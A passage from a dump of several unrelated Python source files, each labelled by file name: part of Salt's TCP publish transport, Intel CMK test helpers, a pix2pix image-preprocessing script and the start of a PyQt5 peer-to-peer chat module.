        while self._mid in self.send_future_map:
            if self._mid >= self._max_messages:
                if wrap:
                    # this shouldn't ever happen, but just in case
                    raise Exception('Unable to find available messageid')
                self._mid = 1
                wrap = True
            else:
                self._mid += 1

        return self._mid

    # TODO: return a message object which takes care of multiplexing?
    def on_recv(self, callback):
        '''
        Register a callback for received messages (that we didn't initiate)
        '''
        if callback is None:
            self._on_recv = callback
        else:
            # Wrap so the registered callback only sees the message body,
            # not the framing header.
            def wrap_recv(header, body):
                callback(body)
            self._on_recv = wrap_recv

    def remove_message_timeout(self, message_id):
        # Cancel the pending timeout callback for a message, if any.
        if message_id not in self.send_timeout_map:
            return
        timeout = self.send_timeout_map.pop(message_id)
        self.io_loop.remove_timeout(timeout)

    def timeout_message(self, message_id):
        # Fired by the io_loop when a send's deadline passes: fail the
        # caller's Future with SaltReqTimeoutError.
        if message_id in self.send_timeout_map:
            del self.send_timeout_map[message_id]
        if message_id in self.send_future_map:
            self.send_future_map.pop(message_id).set_exception(
                SaltReqTimeoutError('Message timed out')
            )

    def send(self, msg, timeout=None, callback=None, raw=False):
        '''
        Send given message, and return a future
        '''
        message_id = self._message_id()
        header = {'mid': message_id}

        future = tornado.concurrent.Future()
        if callback is not None:
            def handle_future(future):
                response = future.result()
                self.io_loop.add_callback(callback, response)
            future.add_done_callback(handle_future)
        # Add this future to the mapping
        self.send_future_map[message_id] = future

        # In detect mode, force a short timeout so transport probing fails fast.
        if self.opts.get('detect_mode') is True:
            timeout = 1

        if timeout is not None:
            send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
            self.send_timeout_map[message_id] = send_timeout

        # if we don't have a send queue, we need to spawn the callback to do the sending
        if len(self.send_queue) == 0:
            self.io_loop.spawn_callback(self._stream_send)
        self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
        return future
class Subscriber(object):
    '''
    Client object for use with the TCP publisher server
    '''
    def __init__(self, stream, address):
        self.stream = stream
        self.address = address
        self._closing = False
        self._read_until_future = None
        # Minion id; filled in after the subscriber authenticates.
        self.id_ = None

    def close(self):
        # Idempotent: only the first call does any work.
        if self._closing:
            return
        self._closing = True
        if self.stream.closed():
            return
        self.stream.close()
        pending = self._read_until_future
        if pending is not None and pending.done():
            # Retrieve the exception so tornado never logs
            # '[ERROR ] Future exception was never retrieved:
            # StreamClosedError'. The reader is always waiting on the
            # next message, and that read future fails with
            # StreamClosedError when the stream is closed.
            pending.exception()

    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701
class PubServer(tornado.tcpserver.TCPServer, object):
    '''
    TCP publisher.

    Accepts subscriber (minion) connections, validates their id/token,
    tracks which minions are present, and fans published payloads out to
    connected subscribers. Optionally fires presence events when the
    master runs TCP-only transport.
    '''
    def __init__(self, opts, io_loop=None):
        super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
        self.io_loop = io_loop
        self.opts = opts
        self._closing = False
        # All currently connected Subscriber objects.
        self.clients = set()
        self.aes_funcs = salt.master.AESFuncs(self.opts)
        # minion id -> set of Subscriber objects (usually one per id).
        self.present = {}
        self.presence_events = False
        if self.opts.get('presence_events', False):
            tcp_only = True
            for transport, _ in iter_transport_opts(self.opts):
                if transport != 'tcp':
                    tcp_only = False
            if tcp_only:
                # Only when the transport is TCP only, the presence events will
                # be handled here. Otherwise, it will be handled in the
                # 'Maintenance' process.
                self.presence_events = True

        if self.presence_events:
            self.event = salt.utils.event.get_event(
                'master',
                opts=self.opts,
                listen=False
            )

    def close(self):
        # Flag only; the read loops check _closing and unwind themselves.
        if self._closing:
            return
        self._closing = True

    # pylint: disable=W1701
    def __del__(self):
        self.close()
    # pylint: enable=W1701

    def _add_client_present(self, client):
        '''
        Record a validated client under its minion id and, if enabled,
        fire 'change' and 'present' presence events.
        '''
        id_ = client.id_
        if id_ in self.present:
            clients = self.present[id_]
            clients.add(client)
        else:
            self.present[id_] = {client}
            if self.presence_events:
                data = {'new': [id_],
                        'lost': []}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    def _remove_client_present(self, client):
        '''
        Drop a client from the presence map; fires presence events when
        the last connection for that minion id goes away.
        '''
        id_ = client.id_
        if id_ is None or id_ not in self.present:
            # This is possible if _remove_client_present() is invoked
            # before the minion's id is validated.
            return

        clients = self.present[id_]
        if client not in clients:
            # Since _remove_client_present() is potentially called from
            # _stream_read() and/or publish_payload(), it is possible for
            # it to be called twice, in which case we will get here.
            # This is not an abnormal case, so no logging is required.
            return

        clients.remove(client)
        if len(clients) == 0:
            del self.present[id_]
            if self.presence_events:
                data = {'new': [],
                        'lost': [id_]}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    @tornado.gen.coroutine
    def _stream_read(self, client):
        '''
        Per-subscriber read loop: decrypt the presence payload the minion
        sends, verify its id/token, and mark it present. Cleans the
        client up when its stream closes.
        '''
        unpacker = salt.utils.msgpack.Unpacker()
        while not self._closing:
            try:
                client._read_until_future = client.stream.read_bytes(4096, partial=True)
                wire_bytes = yield client._read_until_future
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    body = framed_msg['body']
                    if body['enc'] != 'aes':
                        # We only accept 'aes' encoded messages for 'id'
                        continue
                    crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
                    load = crypticle.loads(body['load'])
                    if six.PY3:
                        load = salt.transport.frame.decode_embedded_strs(load)
                    if not self.aes_funcs.verify_minion(load['id'], load['tok']):
                        # Token did not validate; ignore this message.
                        continue
                    client.id_ = load['id']
                    self._add_client_present(client)
            except tornado.iostream.StreamClosedError as e:
                log.debug('tcp stream to %s closed, unable to recv', client.address)
                client.close()
                self._remove_client_present(client)
                self.clients.discard(client)
                break
            except Exception as e:
                log.error('Exception parsing response', exc_info=True)
                continue

    def handle_stream(self, stream, address):
        # tornado TCPServer hook: wrap each new connection in a Subscriber
        # and start its read loop.
        log.trace('Subscriber at %s connected', address)
        client = Subscriber(stream, address)
        self.clients.add(client)
        self.io_loop.spawn_callback(self._stream_read, client)

    # TODO: ACK the publish through IPC
    @tornado.gen.coroutine
    def publish_payload(self, package, _):
        '''
        Frame and write a published payload to subscribers. If the
        package carries a 'topic_lst', only the listed minion ids are
        targeted; otherwise the payload goes to every connected client.
        Clients whose stream has closed are cleaned up afterwards.
        '''
        log.debug('TCP PubServer sending payload: %s', package)
        payload = salt.transport.frame.frame_msg(package['payload'])

        to_remove = []
        if 'topic_lst' in package:
            topic_lst = package['topic_lst']
            for topic in topic_lst:
                if topic in self.present:
                    # This will rarely be a list of more than 1 item. It will
                    # be more than 1 item if the minion disconnects from the
                    # master in an unclean manner (eg cable yank), then
                    # restarts and the master is yet to detect the disconnect
                    # via TCP keep-alive.
                    for client in self.present[topic]:
                        try:
                            # Write the packed str
                            f = client.stream.write(payload)
                            self.io_loop.add_future(f, lambda f: True)
                        except tornado.iostream.StreamClosedError:
                            to_remove.append(client)
                else:
                    log.debug('Publish target %s not connected', topic)
        else:
            for client in self.clients:
                try:
                    # Write the packed str
                    f = client.stream.write(payload)
                    self.io_loop.add_future(f, lambda f: True)
                except tornado.iostream.StreamClosedError:
                    to_remove.append(client)
        for client in to_remove:
            log.debug('Subscriber at %s has disconnected from publisher', client.address)
            client.close()
            self._remove_client_present(client)
            self.clients.discard(client)
        log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
    '''
    Master-side publish channel over TCP.

    Runs the PubServer in a forked daemon process and feeds it payloads
    through a local Salt IPC socket (or TCP port in ipc_mode 'tcp').
    '''
    # TODO: opts!
    # Based on default used in tornado.netutil.bind_sockets()
    backlog = 128

    def __init__(self, opts):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)  # TODO: in init?
        self.ckminions = salt.utils.minions.CkMinions(opts)
        self.io_loop = None

    # __setstate__/__getstate__ make the channel picklable across the
    # process fork; the AES secrets must travel with it.
    def __setstate__(self, state):
        salt.master.SMaster.secrets = state['secrets']
        self.__init__(state['opts'])

    def __getstate__(self):
        return {'opts': self.opts,
                'secrets': salt.master.SMaster.secrets}

    def _publish_daemon(self, **kwargs):
        '''
        Bind to the interface specified in the configuration file
        '''
        salt.utils.process.appendproctitle(self.__class__.__name__)

        # Re-wire multiprocessing-safe logging in the forked process.
        log_queue = kwargs.get('log_queue')
        if log_queue is not None:
            salt.log.setup.set_multiprocessing_logging_queue(log_queue)
        log_queue_level = kwargs.get('log_queue_level')
        if log_queue_level is not None:
            salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
        salt.log.setup.setup_multiprocessing_logging(log_queue)

        # Check if io_loop was set outside
        if self.io_loop is None:
            self.io_loop = tornado.ioloop.IOLoop.current()

        # Spin up the publisher
        pub_server = PubServer(self.opts, io_loop=self.io_loop)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        _set_tcp_keepalive(sock, self.opts)
        sock.setblocking(0)
        sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
        sock.listen(self.backlog)
        # pub_server will take ownership of the socket
        pub_server.add_socket(sock)

        # Set up Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')

        pull_sock = salt.transport.ipc.IPCMessageServer(
            pull_uri,
            io_loop=self.io_loop,
            payload_handler=pub_server.publish_payload,
        )

        # Securely create socket
        log.info('Starting the Salt Puller on %s', pull_uri)
        with salt.utils.files.set_umask(0o177):
            pull_sock.start()

        # run forever
        try:
            self.io_loop.start()
        except (KeyboardInterrupt, SystemExit):
            salt.log.setup.shutdown_multiprocessing_logging()

    def pre_fork(self, process_manager, kwargs=None):
        '''
        Do anything necessary pre-fork. Since this is on the master side this will
        primarily be used to create IPC channels and create our daemon process to
        do the actual publishing
        '''
        process_manager.add_process(self._publish_daemon, kwargs=kwargs)

    def publish(self, load):
        '''
        Publish "load" to minions
        '''
        payload = {'enc': 'aes'}

        crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
        payload['load'] = crypticle.dumps(load)
        if self.opts['sign_pub_messages']:
            master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
            log.debug("Signing data packet")
            payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
        # Use the Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
        # TODO: switch to the actual asynchronous interface
        #pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
        pub_sock = salt.utils.asynchronous.SyncWrapper(
            salt.transport.ipc.IPCMessageClient,
            (pull_uri,)
        )
        pub_sock.connect()

        int_payload = {'payload': self.serial.dumps(payload)}

        # add some targeting stuff for lists only (for now)
        if load['tgt_type'] == 'list' and not self.opts.get("order_masters", False):
            if isinstance(load['tgt'], six.string_types):
                # Fetch a list of minions that match
                _res = self.ckminions.check_minions(load['tgt'],
                                                    tgt_type=load['tgt_type'])
                match_ids = _res['minions']

                log.debug("Publish Side Match: %s", match_ids)
                # Send list of minions thru so zmq can target them
                int_payload['topic_lst'] = match_ids
            else:
                int_payload['topic_lst'] = load['tgt']
        # Send it over IPC!
        pub_sock.send(int_payload)
|
helpers.py | # Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from intel import util
import copy
import os
import random
import string
import subprocess
from threading import Thread
def conf_dir(name):
    """Return the absolute path of the test config directory called *name*."""
    root = util.cmk_root()
    return os.path.join(root, "tests", "data", "config", name)
def procfs_dir(name):
    """Return the absolute path of the test procfs directory called *name*."""
    root = util.cmk_root()
    return os.path.join(root, "tests", "data", "sysfs", name, "proc")
def sysfs_dir(name):
    """Return the absolute path of the test sysfs directory called *name*."""
    root = util.cmk_root()
    return os.path.join(root, "tests", "data", "sysfs", name)
def rand_str(length=8, chars=string.ascii_lowercase + string.digits):
    """Return a random string of *length* characters drawn from *chars*."""
    picks = [random.choice(chars) for _ in range(length)]
    return ''.join(picks)
# Returns resulting stdout buffer from interpreting the supplied command with
# a shell. Raises process errors if the command exits nonzero.
def execute(cmd, args=None, env=None):
    """Run *cmd* (with optional *args*) through a shell and return its stdout.

    The current process environment is copied and extended with *env*.
    Raises subprocess.CalledProcessError if the command exits nonzero;
    stderr is folded into the returned stdout buffer.
    """
    # Use None sentinels instead of mutable default arguments ([] / {}),
    # which are shared across calls in Python.
    args = [] if args is None else args
    env = {} if env is None else env
    cmd_str = "{} {}".format(cmd, " ".join(args))
    host_env = copy.deepcopy(os.environ)
    host_env.update(env)
    stdout = subprocess.check_output(
        cmd_str, shell=True, stderr=subprocess.STDOUT, env=host_env)
    return stdout
def background(f):
    """Wrap callable *f* in a BackgroundContext for use in a ``with`` block."""
    return BackgroundContext(f)
class BackgroundContext:
    """Run a callable on a background thread for the duration of a ``with`` block.

    Entering starts the thread and yields it. Exiting is deliberately a
    no-op -- the thread is NOT joined, so callers that need completion
    must join the yielded thread themselves.
    """

    def __init__(self, f):
        # The thread is created eagerly but only started on __enter__.
        self.t = Thread(target=f)

    def __enter__(self):
        self.t.start()
        return self.t

    def __exit__(self, exc_type, exc_value, exc_tb):
        # Intentionally empty: the thread may outlive the block.
        pass
|
process.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
# Shared multiprocessing pool; created lazily in main() only for the
# "edges" operation.
edge_pool = None

# Command-line interface: one input/output directory pair plus an
# operation selector. NOTE(review): the defaults are hard-coded Windows
# paths specific to one machine.
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", help="path to folder containing images",default='E:\download\COCO\\train2014\\train2014Resize')
parser.add_argument("--output_dir", help="output path",default='E:\download\COCO\\train2014\\train2014Combined')
parser.add_argument("--operation", choices=["grayscale", "resize", "blank", "combine", "edges", "blur"],default='combine')
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation",default='E:\download\COCO\\train2014\\train2014Blur')
# Parsed arguments, referenced globally throughout this module as `a`.
a = parser.parse_args()
def resize(src):
    """Return *src* squared (by pad or crop) and scaled to a.size x a.size.

    src: image array; assumed shape (height, width, channels) -- the
    unpacking of src.shape requires exactly three dimensions.
    """
    height, width, _ = src.shape
    dst = src
    if height != width:
        if a.pad:
            size = max(height, width)
            # pad to correct ratio
            oh = (size - height) // 2
            ow = (size - width) // 2
            dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
        else:
            # crop to correct ratio
            size = min(height, width)
            oh = (height - size) // 2
            ow = (width - size) // 2
            dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)

    # The image must be square before scaling.
    assert(dst.shape[0] == dst.shape[1])

    size, _, _ = dst.shape
    if size > a.size:
        dst = im.downscale(images=dst, size=[a.size, a.size])
    elif size < a.size:
        dst = im.upscale(images=dst, size=[a.size, a.size])
    return dst
def blank(src):
    """Blank out a centered square covering 30% of the image with white.

    Raises if the image is not square.
    NOTE(review): `dst = src` aliases the input, so the white square is
    written into the caller's array in place; use a copy if the caller's
    image must stay intact.
    """
    height, width, _ = src.shape
    if height != width:
        raise Exception("non-square image")

    image_size = width
    size = int(image_size * 0.3)
    offset = int(image_size / 2 - size / 2)

    dst = src
    dst[offset:offset + size, offset:offset + size, :] = np.ones([size, size, 3])
    return dst
def combine(src, src_path):
    """Concatenate *src* side by side with its sibling image from a.b_dir.

    The sibling is looked up by the basename of *src_path* with either a
    .png or .jpg extension. Both images are normalized to 3-channel RGB
    before concatenation. Raises when b_dir is unset, the sibling is
    missing, or the dimensions differ.
    """
    if a.b_dir is None:
        raise Exception("missing b_dir")

    # find corresponding file in b_dir, could have a different extension
    basename, _ = os.path.splitext(os.path.basename(src_path))
    for ext in [".png", ".jpg"]:
        sibling_path = os.path.join(a.b_dir, basename + ext)
        if os.path.exists(sibling_path):
            sibling = im.load(sibling_path)
            break
    else:
        # for/else: no extension matched.
        raise Exception("could not find sibling image for " + src_path)

    # make sure that dimensions are correct
    height, width, _ = src.shape
    if height != sibling.shape[0] or width != sibling.shape[1]:
        raise Exception("differing sizes")

    # convert both images to RGB if necessary
    if src.shape[2] == 1:
        src = im.grayscale_to_rgb(images=src)

    if sibling.shape[2] == 1:
        sibling = im.grayscale_to_rgb(images=sibling)

    # remove alpha channel
    if src.shape[2] == 4:
        src = src[:, :, :3]

    if sibling.shape[2] == 4:
        sibling = sibling[:, :, :3]

    # A on the left, B on the right (pix2pix AB format).
    return np.concatenate([src, sibling], axis=1)
def grayscale(src):
    """Return *src* converted to grayscale, replicated back to 3 RGB channels."""
    return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
def blur(src, scale=4):
    """Blur *src* by downscaling by *scale* and upscaling back to the original size."""
    height, width, _ = src.shape
    height_down = height // scale
    width_down = width // scale
    dst = im.downscale(images=src, size=[height_down, width_down])
    dst = im.upscale(images=dst, size=[height, width])
    return dst
# HED caffe network, created lazily on first use by run_caffe().
net = None


def run_caffe(src):
    """Run the HED edge-detection network on *src* and return the fused edge map.

    src is assumed to be a preprocessed (channels, height, width) array
    as produced by edges() -- TODO confirm against caller.
    """
    # lazy load caffe and create net
    global net
    if net is None:
        # don't require caffe unless we are doing edge detection
        os.environ["GLOG_minloglevel"] = "2"  # disable logging from caffe
        import caffe
        # using this requires using the docker image or assembling a bunch of dependencies
        # and then changing these hardcoded paths
        net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)

    # Reshape the input blob to a batch of one image and run a forward pass.
    net.blobs["data"].reshape(1, *src.shape)
    net.blobs["data"].data[...] = src
    net.forward()
    return net.blobs["sigmoid-fuse"].data[0][0, :, :]
def edges(src):
    """Detect edges in *src* with HED (via caffe) and thin them with Octave.

    The HED pass runs in the shared `edge_pool` worker process; the
    postprocessing (non-maximum suppression, thinning, small-edge
    removal) is delegated to an Octave subprocess through temp files.
    """
    # based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
    # and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
    import scipy.io
    src = src * 255
    border = 128  # put a padding around images since edge detection seems to detect edge of image
    src = src[:, :, :3]  # remove alpha channel if present
    src = np.pad(src, ((border, border), (border, border), (0, 0)), "reflect")
    # RGB -> BGR and mean subtraction (caffe preprocessing convention).
    src = src[:, :, ::-1]
    src -= np.array((104.00698793, 116.66876762, 122.67891434))
    src = src.transpose((2, 0, 1))

    # [height, width, channels] => [batch, channel, height, width]
    fuse = edge_pool.apply(run_caffe, [src])
    fuse = fuse[border:-border, border:-border]

    with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
        scipy.io.savemat(mat_file.name, {"input": fuse})

        octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""

        # Bind the file paths and tuning knobs as Octave variables.
        config = dict(
            input_path="'%s'" % mat_file.name,
            output_path="'%s'" % png_file.name,
            image_width=256,
            threshold=25.0 / 255.0,
            small_edge=5,
        )

        args = ["octave"]
        for k, v in config.items():
            args.extend(["--eval", "%s=%s;" % (k, v)])

        args.extend(["--eval", octave_code])
        try:
            subprocess.check_output(args, stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as e:
            print("octave failed")
            print("returncode:", e.returncode)
            print("output:", e.output)
            raise
        return im.load(png_file.name)
def process(src_path, dst_path):
    """Load the image at *src_path*, apply the selected operation, save the result to *dst_path*."""
    src = im.load(src_path)

    # Dispatch table keyed by the --operation flag; combine() also needs
    # the source path to locate its sibling image.
    handlers = {
        "grayscale": grayscale,
        "resize": resize,
        "blank": blank,
        "combine": lambda image: combine(image, src_path),
        "edges": edges,
        "blur": blur,
    }
    handler = handlers.get(a.operation)
    if handler is None:
        raise Exception("invalid operation")

    im.save(handler(src), dst_path)
# Progress-tracking state shared by all worker threads; guarded by
# complete_lock. `start` and `total` are filled in by main().
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0


def complete():
    """Record that one image finished and print a progress/ETA line.

    Thread-safe; intended to be called once per processed image.
    """
    global num_complete, rate, last_complete

    with complete_lock:
        num_complete += 1
        now = time.time()
        # NOTE(review): divides by elapsed; would raise ZeroDivisionError
        # if called in the same instant as start -- in practice I/O makes
        # elapsed nonzero.
        elapsed = now - start
        rate = num_complete / elapsed
        if rate > 0:
            remaining = (total - num_complete) / rate
        else:
            remaining = 0

        print("%d/%d complete  %0.2f images/sec  %dm%ds elapsed  %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))

        last_complete = now
def main():
    """Process every image in a.input_dir into a.output_dir.

    Files whose output already exists are skipped. With one worker,
    images are processed sequentially; with more, a TF input-producer
    queue feeds a pool of threads.
    """
    if not os.path.exists(a.output_dir):
        os.makedirs(a.output_dir)

    src_paths = []
    dst_paths = []
    skipped = 0
    for src_path in im.find(a.input_dir):
        name, _ = os.path.splitext(os.path.basename(src_path))
        dst_path = os.path.join(a.output_dir, name + ".png")
        if os.path.exists(dst_path):
            skipped += 1
        else:
            src_paths.append(src_path)
            dst_paths.append(dst_path)

    print("skipping %d files that already exist" % skipped)

    global total
    total = len(src_paths)

    print("processing %d files" % total)

    global start
    start = time.time()

    if a.operation == "edges":
        # use a multiprocessing pool for this operation so it can use multiple CPUs
        # create the pool before we launch processing threads
        global edge_pool
        edge_pool = multiprocessing.Pool(a.workers)

    if a.workers == 1:
        with tf.Session() as sess:
            for src_path, dst_path in zip(src_paths, dst_paths):
                process(src_path, dst_path)
                complete()
    else:
        # Feed (src, dst) pairs through a TF queue for the worker threads.
        queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1)
        dequeue_op = queue.dequeue()

        def worker(coord):
            # NOTE(review): `sess` is resolved at call time from the
            # enclosing scope; it exists because threads are only started
            # inside the `with tf.Session() as sess` block below.
            with sess.as_default():
                while not coord.should_stop():
                    try:
                        src_path, dst_path = sess.run(dequeue_op)
                    except tf.errors.OutOfRangeError:
                        coord.request_stop()
                        break
                    process(src_path, dst_path)
                    complete()

        # init epoch counter for the queue
        local_init_op = tf.local_variables_initializer()
        with tf.Session() as sess:
            sess.run(local_init_op)
            coord = tf.train.Coordinator()
            threads = tf.train.start_queue_runners(coord=coord)
            for i in range(a.workers):
                t = threading.Thread(target=worker, args=(coord,))
                t.start()
                threads.append(t)

            try:
                coord.join(threads)
            except KeyboardInterrupt:
                coord.request_stop()
                coord.join(threads)

main()
|
P2P.py | import socket
import threading
import inspect
import ctypes
from ConnectServer import DEBUG_MODE
from PyQt5.QtCore import pyqtSignal, QObject
# def _async_raise(tid, exctype):
# tid = ctypes.c_long(tid)
# if not inspect.isclass(exctype):
# exctype = type(exctype)
# res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
# if res == 0:
# raise ValueError("invalid thread id")
# elif res != 1:
# ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
# raise SystemError("PyThreadState_SetAsyncExc failed")
# def stop_thread(thread):
# _async_raise(thread.ident, SystemExit)
class Server(QObject):
    '''
    P2P chat server side: accepts peer connections, keeps a per-peer
    message record, and notifies the UI through Qt signals.
    '''
    # Signals consumed by the UI layer.
    showMsgByIdSignal = pyqtSignal(str)
    setOfflineSignal = pyqtSignal(str)
    setOnlineSignal = pyqtSignal(str)

    def __init__(self, port, id, textBrowser_msg):
        super().__init__()
        # Parallel lists indexed together: connection socket, remote
        # address, and per-connection message record; src_ids holds the
        # peer ids in connection order.
        self.connections = []
        self.addresses = []
        self.src_ids = []
        self.id = id
        self.msgRecords = []
        self.textBrowser_msg = textBrowser_msg
        # Id of the peer whose conversation is currently displayed.
        self.curMsgId = ""
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(('0.0.0.0', port))
        self.sock.listen(5)
        # Accept loop runs on a daemon thread for the server's lifetime.
        listenConnectionThread = threading.Thread(target=self.listenConnection)
        listenConnectionThread.daemon = True
        listenConnectionThread.start()
        if DEBUG_MODE:
            print("Server running ...")

    def __del__(self):
        for c in self.connections:
            c.close()

    def listenConnection(self):
        '''
        Accept incoming peer connections forever; each connection gets
        its own listener thread and an empty message record.
        '''
        while True:
            c, a = self.sock.accept()
            if DEBUG_MODE:
                print(str(a[0]) + ':' + str(a[1]), "connected")
            listenThread = threading.Thread(target=self.listenMsg, args=(c, a))
            listenThread.daemon = True
            listenThread.start()
            self.connections.append(c)
            self.addresses.append(a)
            self.msgRecords.append("")

    def listenMsg(self, c, a):
        '''
        Per-connection receive loop. The first 10 bytes of each packet
        carry the sender's id (fixed-width framing -- assumes ids are
        exactly 10 characters; TODO confirm), the rest is message text.
        Cleans up the connection's entries on disconnect or error.
        '''
        while True:
            try:
                # NOTE(review): recv(1024) is not message-framed; a long
                # message could be split across reads.
                data = c.recv(1024)
                if not data:
                    if DEBUG_MODE:
                        print(str(a[0]) + ':' + str(a[1]), "disconnectd")
                    idx = self.connections.index(c)
                    self.setOfflineSignal.emit(self.src_ids[idx])
                    self.src_ids.remove(self.src_ids[idx])
                    self.msgRecords.remove(self.msgRecords[idx])
                    self.connections.remove(c)
                    self.addresses.remove(a)
                    c.close()
                    break
                data = data.decode("utf-8")
                if data[:10] not in self.src_ids:
                    # First packet from this peer announces its id.
                    self.src_ids.append(data[:10])
                    self.setOnlineSignal.emit(data[:10])
                data = data[10:]
                if data != "":
                    idx = self.connections.index(c)
                    if self.msgRecords[idx] != "":
                        self.msgRecords[idx] += "\n" + self.src_ids[idx] + ": " + data
                    else:
                        self.msgRecords[idx] += self.src_ids[idx] + ": " + data
                    # Refresh the UI only if this conversation is open.
                    if self.src_ids[idx] == self.curMsgId:
                        self.showMsgByIdSignal.emit(self.curMsgId)
            except Exception as e:
                if DEBUG_MODE:
                    print(e)
                    print(str(a[0]) + ':' + str(a[1]), "disconnectd")
                idx = self.connections.index(c)
                self.setOfflineSignal.emit(self.src_ids[idx])
                self.src_ids.remove(self.src_ids[idx])
                self.msgRecords.remove(self.msgRecords[idx])
                self.connections.remove(c)
                self.addresses.remove(a)
                c.close()
                break

    def sendMsg(self, client_id, msg):
        '''
        Append *msg* to the record for *client_id*, send it to that peer,
        and refresh the UI.
        NOTE(review): when client_id is unknown, idx becomes -1 and the
        record/connection of the LAST peer is silently used -- likely a bug.
        '''
        idx = self.src_ids.index(client_id) if (client_id in self.src_ids) else -1
        if self.msgRecords[idx] != "":
            self.msgRecords[idx] += "\n" + self.id + ": " + msg
        else:
            self.msgRecords[idx] += self.id + ": " + msg
        c = self.connections[idx]
        c.sendall(msg.encode("utf-8"))
        self.showMsgByIdSignal.emit(client_id)

    def showMsgById(self, client_id):
        # Display the record for client_id in the UI text browser.
        # NOTE(review): same idx == -1 fallback issue as sendMsg().
        idx = self.src_ids.index(client_id) if (client_id in self.src_ids) else -1
        self.textBrowser_msg.setText(self.msgRecords[idx])

    def setCurMsgId(self, id):
        # Switch the displayed conversation to the given peer id.
        self.curMsgId = id
        if id in self.src_ids:
            self.showMsgByIdSignal.emit(id)
class Client(QObject):
    '''
    P2P chat client side: connects out to a peer's Server, keeps the
    conversation record, and notifies the UI through Qt signals.
    '''
    showRecordSignal = pyqtSignal()
    removeClientSignal = pyqtSignal()

    def __init__(self, dst_ip, dst_port, dst_id, src_id, textBrowser_msg):
        super().__init__()
        self.record = ""
        self.src_id = src_id
        self.dst_id = dst_id
        self.dst_ip = dst_ip
        self.dst_port = dst_port
        self.textBrowser_msg = textBrowser_msg
        self.curMsgId = ""
        self.toUpdate = False
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.connect((dst_ip, dst_port))
        # Receive loop runs on a daemon thread for the client's lifetime.
